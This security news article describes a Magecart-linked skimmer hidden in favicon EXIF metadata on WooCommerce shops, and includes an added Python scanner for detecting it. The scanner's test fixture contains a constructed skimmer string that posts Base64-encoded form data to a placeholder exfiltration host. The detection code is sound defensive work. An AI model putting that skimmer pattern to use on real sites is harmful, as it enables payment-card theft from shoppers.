Criminals hide web skimmers in image metadata


Jun 28, 2020
According to experts, the attacks may be carried out by members of the Magecart Group 9.


Specialists from Malwarebytes discovered a malicious campaign in which cybercriminals hid skimming code in the EXIF metadata of a favicon (website icon) file and covertly loaded it into the pages of compromised online shops.

On one of the compromised sites, which was not named, the researchers found a copy of the skimmer's source code and noticed that an ordinary-looking favicon.ico file carried a script embedded in its Copyright field.

According to the experts, the web skimmer was found in the EXIF metadata of an image file loaded by compromised online stores running the WooCommerce plugin for WordPress. The loader that fetched the malicious image was injected into a legitimate script on the store sites. The researchers traced the activity to cddn[.]site, the domain from which the malicious favicon was served. The attackers used a favicon identical to the one the compromised stores already used, so the swap was not visible; the file was pulled in with an ordinary <img> tag, and the loader then read the JavaScript out of the Copyright field in the image metadata and executed it.
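The check a practitioner would want here is to inspect what a favicon actually contains rather than trusting its name: an .ico file that carries EXIF is really a JPEG, and a Copyright field holding JavaScript is the tell. The following Python scanner is an added example, not code from the article or from Malwarebytes. It walks the JPEG marker segments, parses the APP1/Exif TIFF structure, pulls the Copyright tag (0x8298) and flags script-like content. The fixture image and the "skimmer" string it carries are constructed stand-ins (the exfiltration host in it is a placeholder, and the string is not the real payload); the indicator list is an assumption chosen for this example.

```python
import re
import struct

COPYRIGHT_TAG = 0x8298  # EXIF/TIFF "Copyright", ASCII type

# Strings that have no business in a copyright notice but are common in
# in-browser skimmers. Assumed indicator set for this example.
SCRIPT_INDICATORS = re.compile(
    rb"(function\s*\(|=>|document\.|window\.|eval\(|atob\(|btoa\(|"
    rb"XMLHttpRequest|fetch\(|\.reverse\(\))"
)


def build_exif_jpeg(copyright_text: bytes) -> bytes:
    """Constructed test fixture: a minimal JPEG whose APP1/Exif segment has a
    single IFD0 entry, Copyright (0x8298). Mimics the favicon described in
    the article; values <= 4 bytes are stored inline per the TIFF spec."""
    value = copyright_text + b"\x00"          # ASCII values are NUL-terminated
    ifd_offset = 8                             # IFD0 right after the TIFF header
    data_offset = ifd_offset + 2 + 12 + 4      # count + one entry + next-IFD link
    if len(value) <= 4:
        entry = struct.pack("<HHI", COPYRIGHT_TAG, 2, len(value)) + value.ljust(4, b"\x00")
        tail = b""
    else:
        entry = struct.pack("<HHII", COPYRIGHT_TAG, 2, len(value), data_offset)
        tail = value
    tiff = b"II" + struct.pack("<HI", 0x2A, ifd_offset)
    tiff += struct.pack("<H", 1) + entry + struct.pack("<I", 0) + tail
    payload = b"Exif\x00\x00" + tiff
    app1 = b"\xff\xe1" + struct.pack(">H", len(payload) + 2) + payload
    return b"\xff\xd8" + app1 + b"\xff\xd9"


def _parse_tiff_ascii(tiff: bytes) -> dict:
    """Return {tag: bytes} for every ASCII-typed entry in the chained IFDs."""
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None:
        raise ValueError("bad TIFF byte-order mark")
    magic, ifd = struct.unpack(endian + "HI", tiff[2:8])
    if magic != 0x2A:
        raise ValueError("bad TIFF magic")
    tags, seen = {}, set()
    while ifd and ifd not in seen and ifd + 2 <= len(tiff):  # loop guard for cyclic IFD links
        seen.add(ifd)
        (count,) = struct.unpack(endian + "H", tiff[ifd:ifd + 2])
        for i in range(count):
            e = ifd + 2 + 12 * i
            if e + 12 > len(tiff):
                break
            tag, typ, n, val = struct.unpack(endian + "HHII", tiff[e:e + 12])
            if typ != 2:                       # only ASCII entries matter here
                continue
            off = e + 8 if n <= 4 else val     # inline value vs. offset into TIFF data
            tags[tag] = tiff[off:off + n].rstrip(b"\x00")
        nxt = ifd + 2 + 12 * count
        if nxt + 4 > len(tiff):
            break
        (ifd,) = struct.unpack(endian + "I", tiff[nxt:nxt + 4])
    return tags


def exif_ascii_tags(data: bytes) -> dict:
    """Walk JPEG marker segments up to SOS and parse the first APP1 Exif block."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (no SOI marker)")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):             # EOI or SOS: no more metadata segments
            break
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # stand-alone markers, no length
            pos += 2
            continue
        (seglen,) = struct.unpack(">H", data[pos + 2:pos + 4])
        seg = data[pos + 4:pos + 2 + seglen]
        if marker == 0xE1 and seg.startswith(b"Exif\x00\x00"):
            return _parse_tiff_ascii(seg[6:])
        pos += 2 + seglen
    return {}


def scan_for_exif_skimmer(data: bytes) -> dict:
    """Verdict for one fetched image, judged by content rather than file name."""
    try:
        tags = exif_ascii_tags(data)
    except ValueError as err:
        return {"jpeg": False, "error": str(err), "indicators": [], "suspicious": False}
    text = tags.get(COPYRIGHT_TAG, b"")
    hits = sorted({m.decode("latin-1") for m in SCRIPT_INDICATORS.findall(text)})
    # A real notice is a short line of text; any script token or an oversized
    # field is enough to pull the file for manual review.
    return {"jpeg": True, "copyright_len": len(text), "indicators": hits,
            "suspicious": bool(hits) or len(text) > 512}


# Constructed stand-in for a skimmer string; exfil.invalid is a placeholder host.
SAMPLE_SKIMMER = (b"(function(){var f=document.forms[0];fetch('https://exfil.invalid/i.png',"
                  b"{method:'POST',body:btoa(f.innerText).split('').reverse().join('')})})()")

if __name__ == "__main__":
    for label, note in (("clean favicon", b"Copyright 2020 Example Shop"),
                        ("skimmer favicon", SAMPLE_SKIMMER)):
        print(label, scan_for_exif_skimmer(build_exif_jpeg(note)))
```

Run it over every favicon and image response a store actually serves, keyed on the bytes rather than the extension; the file in this campaign was named favicon.ico, which an extension-based filter would never treat as a JPEG with EXIF.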

Like other tools of this kind, the skimmer stole the contents of input fields, including names, billing addresses and payment card data. It Base64-encoded the stolen information, reversed the resulting string and sent it to the criminals' remote server in a POST request disguised as an image file upload.

As the security researcher known by the pseudonym @AffableKraut suggests, the skimmer may be linked to Magecart Group 9. The domain used with this EXIF metadata skimming technique, magentorates[.]com, sits with the same Bulgarian hosting provider as, and was registered weeks after, magerates[.]com, a domain previously attributed to Magecart Group 9.